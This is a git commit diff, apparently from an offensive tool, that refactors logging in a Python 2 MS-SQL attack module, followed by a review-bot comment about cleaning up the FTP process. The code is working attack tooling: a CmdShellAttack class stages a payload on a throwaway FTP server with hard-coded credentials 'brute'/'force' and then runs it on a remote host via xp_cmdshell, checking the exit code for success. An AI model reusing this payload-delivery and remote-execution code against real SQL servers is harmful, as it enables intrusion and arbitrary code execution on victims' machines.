* Finalized the MS-SQL code
* Changed the log to the right handle and added exception info.
* Better docs and some PEP 8
parent
149525d205
commit
b46810e02b
|
@ -1,5 +1,6 @@
|
||||||
from os import path
|
from os import path
|
||||||
import logging
|
import logging
|
||||||
|
|
||||||
import pymssql
|
import pymssql
|
||||||
|
|
||||||
import mssqlexec_utils
|
import mssqlexec_utils
|
||||||
|
|
|
@ -1,4 +1,3 @@
|
||||||
|
|
||||||
import os
|
import os
|
||||||
import multiprocessing
|
import multiprocessing
|
||||||
import logging
|
import logging
|
||||||
|
@ -11,12 +10,17 @@ from pyftpdlib.handlers import FTPHandler
|
||||||
from pyftpdlib.servers import FTPServer
|
from pyftpdlib.servers import FTPServer
|
||||||
|
|
||||||
|
|
||||||
|
__author__ = 'Maor Rayzin'
|
||||||
|
|
||||||
|
|
||||||
FTP_SERVER_PORT = 1026
|
FTP_SERVER_PORT = 1026
|
||||||
FTP_SERVER_ADDRESS = ''
|
FTP_SERVER_ADDRESS = ''
|
||||||
FTP_SERVER_USER = 'brute'
|
FTP_SERVER_USER = 'brute'
|
||||||
FTP_SERVER_PASSWORD = 'force'
|
FTP_SERVER_PASSWORD = 'force'
|
||||||
FTP_WORKING_DIR = '.'
|
FTP_WORKING_DIR = '.'
|
||||||
|
|
||||||
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
class FTP:
|
class FTP:
|
||||||
|
|
||||||
|
@ -131,12 +135,12 @@ class CmdShellAttack(AttackHost):
|
||||||
for cmd in shellcmds:
|
for cmd in shellcmds:
|
||||||
self.cursor.execute(cmd)
|
self.cursor.execute(cmd)
|
||||||
except Exception, e:
|
except Exception, e:
|
||||||
logging.error('Error sending the payload using xp_cmdshell to host: {0}'.format(e.message))
|
LOG.error('Error sending the payload using xp_cmdshell to host', exc_info=True)
|
||||||
self.ftp_server_p.terminate()
|
self.ftp_server_p.terminate()
|
||||||
return False
|
return False
|
||||||
return True
|
return True
|
||||||
else:
|
else:
|
||||||
logging.error("Couldn't establish an FTP server for the dropout")
|
LOG.error("Couldn't establish an FTP server for the dropout")
|
||||||
return False
|
return False
|
||||||
|
|
||||||
def execute_payload(self):
|
def execute_payload(self):
|
||||||
|
@ -151,27 +155,27 @@ class CmdShellAttack(AttackHost):
|
||||||
# Getting the payload's file name
|
# Getting the payload's file name
|
||||||
payload_file_name = os.path.split(self.payload_path)[1]
|
payload_file_name = os.path.split(self.payload_path)[1]
|
||||||
|
|
||||||
# Preparing the cmd to run on remote, using no_output so i can capture exit code: 0 -> success, 1 -> error.
|
# Preparing the cmd to run on remote, using no_output so I can capture exit code: 0 -> success, 1 -> error.
|
||||||
shellcmd = """DECLARE @i INT \
|
shellcmd = """DECLARE @i INT \
|
||||||
EXEC @i=xp_cmdshell "chdir C:\\& C:\\tmp\\{0}", no_output \
|
EXEC @i=xp_cmdshell "chdir C:\\& C:\\tmp\\{0}", no_output \
|
||||||
SELECT @i """.format(payload_file_name)
|
SELECT @i """.format(payload_file_name)
|
||||||
|
|
||||||
try:
|
try:
|
||||||
# Executing payload on remote host
|
# Executing payload on remote host
|
||||||
logging.debug('Starting execution process of payload: {0} on remote host'.format(payload_file_name))
|
LOG.debug('Starting execution process of payload: {0} on remote host'.format(payload_file_name))
|
||||||
self.cursor.execute(shellcmd)
|
self.cursor.execute(shellcmd)
|
||||||
if self.cursor.fetchall()[0][0] == 0:
|
if self.cursor.fetchall()[0][0] == 0:
|
||||||
# Success
|
# Success
|
||||||
self.ftp_server_p.terminate()
|
self.ftp_server_p.terminate()
|
||||||
logging.debug('Payload: {0} execution on remote host was a success'.format(payload_file_name))
|
LOG.debug('Payload: {0} execution on remote host was a success'.format(payload_file_name))
|
||||||
return True
|
return True
|
||||||
else:
|
else:
|
||||||
logging.warning('Payload: {0} execution on remote host failed'.format(payload_file_name))
|
LOG.warning('Payload: {0} execution on remote host failed'.format(payload_file_name))
|
||||||
self.ftp_server_p.terminate()
|
self.ftp_server_p.terminate()
|
||||||
return False
|
return False
|
||||||
|
|
||||||
except pymssql.OperationalError:
|
except pymssql.OperationalError:
|
||||||
logging.error('Executing payload: {0} failed'.format(payload_file_name))
|
LOG.error('Executing payload: {0} failed'.format(payload_file_name), exc_info=True)
|
||||||
self.ftp_server_p.terminate()
|
self.ftp_server_p.terminate()
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
@ -189,10 +193,10 @@ class CmdShellAttack(AttackHost):
|
||||||
multiprocessing.log_to_stderr(logging.DEBUG)
|
multiprocessing.log_to_stderr(logging.DEBUG)
|
||||||
p = multiprocessing.Process(target=ftp_s.run_server)
|
p = multiprocessing.Process(target=ftp_s.run_server)
|
||||||
p.start()
|
p.start()
|
||||||
logging.debug('Successfully established an FTP server in another process: {0}, {1}'.format(ftp_s, p.name))
|
LOG.debug('Successfully established an FTP server in another process: {0}, {1}'.format(ftp_s, p.name))
|
||||||
return ftp_s, p
|
return ftp_s, p
|
||||||
except Exception, e:
|
except Exception, e:
|
||||||
logging.error('Exception raised while trying to pull up the ftp server: {0}'.format(e.message))
|
LOG.error('Exception raised while trying to pull up the ftp server', exc_info=True)
|
||||||
return None, None
|
return None, None
|
||||||
|
|
||||||
def __find_own_ip(self):
|
def __find_own_ip(self):
|
||||||
|
|
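Review bot: In `execute_payload`, only `pymssql.OperationalError` is caught, so any other failure inside the `try` (for example an `IndexError` from `self.cursor.fetchall()[0][0]` on an empty result set) propagates without `self.ftp_server_p.terminate()` being called. That would leave the helper FTP process running with the fixed `FTP_SERVER_USER`/`FTP_SERVER_PASSWORD` values declared at the top of this file, and `FTP_SERVER_ADDRESS = ''` presumably binds it on every interface. Replacing the three duplicated calls with a single `finally: self.ftp_server_p.terminate()` clause would tear the listener down on every exit path. The start of the method body lies outside this hunk, so this assumes `ftp_server_p` is always set before the `try`.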
|
@ -0,0 +1 @@
|
||||||
|
dir c:\>c:\tmp\dir.txt
|